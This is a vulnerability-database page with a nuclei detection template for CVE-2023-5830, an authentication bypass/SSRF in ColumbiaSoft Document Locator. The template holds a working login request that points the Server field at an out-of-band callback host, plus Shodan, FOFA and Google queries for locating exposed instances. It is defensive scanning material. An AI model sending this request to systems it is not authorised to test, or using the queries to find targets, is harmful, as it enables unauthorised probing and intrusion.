Lucene search
K

ColumbiaSoft DocumentLocator - Improper Authentication

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 54 Views

Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability allowing unauthorized access to sensitive information. Upgrade to a patched version to fix the issue

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-5830
25 Nov 202400:00
circl
CNNVD
ColumbiaSoft Document Locator Security Vulnerability
27 Oct 202300:00
cnnvd
CVE
CVE-2023-5830
27 Oct 202320:31
cve
Cvelist
CVE-2023-5830 ColumbiaSoft Document Locator WebTools login improper authentication
27 Oct 202320:31
cvelist
NVD
CVE-2023-5830
27 Oct 202321:15
nvd
OSV
CVE-2023-5830
27 Oct 202321:15
osv
Prion
Authentication flaw
27 Oct 202321:15
prion
RedhatCVE
CVE-2023-5830
23 May 202504:33
redhatcve
The Hacker News
Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in Coordinated Cyber Attack
12 Mar 202511:56
thn
VulnCheck KEV
VulnCheck KEV: CVE-2023-5830
11 Apr 202400:00
vulncheck_kev
Rows per page
id: CVE-2023-5830

info:
  name: ColumbiaSoft DocumentLocator - Improper Authentication
  author: Gonski
  severity: critical
  description: |
    Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.
  impact: |
    An attacker could exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5830
    - https://vuldb.com/?ctiid.243729
    - https://github.com/advisories/GHSA-j89v-wm7x-4434
    - https://vuldb.com/?id.243729
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5830
    cwe-id: CWE-287
    epss-score: 0.61043
    epss-percentile: 0.99045
    cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: documentlocator
    product: document_locator
    shodan-query:
      - 'title:"Document Locator - WebTools"'
      - http.title:"document locator - webtools"
    fofa-query: title="document locator - webtools"
    google-query: intitle:"document locator - webtools"
  tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        POST /api/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        {
          "LoginType":"differentWindows",
          "User":"{{randstr}}",
          "Password":"{{rand_base(5, "abc")}}",
          "Domain":"{{randstr}}",
          "Server":"{{interactsh-url}}",
          "Repository":"{{randstr}}"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '"Authorized":false'
# digest: 4b0a00483046022100b28681831dfe2c1c046df1570a6e220de635b50fca90c668f6d3f8323c9178f9022100889eebbade6b17c33ee6e414879e1f60f20ad5ec9f78b50d8144a00aa1291f3f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.3 - 9.8
CVSS 27.5
CVSS 37.3
EPSS0.61043
SSVC
54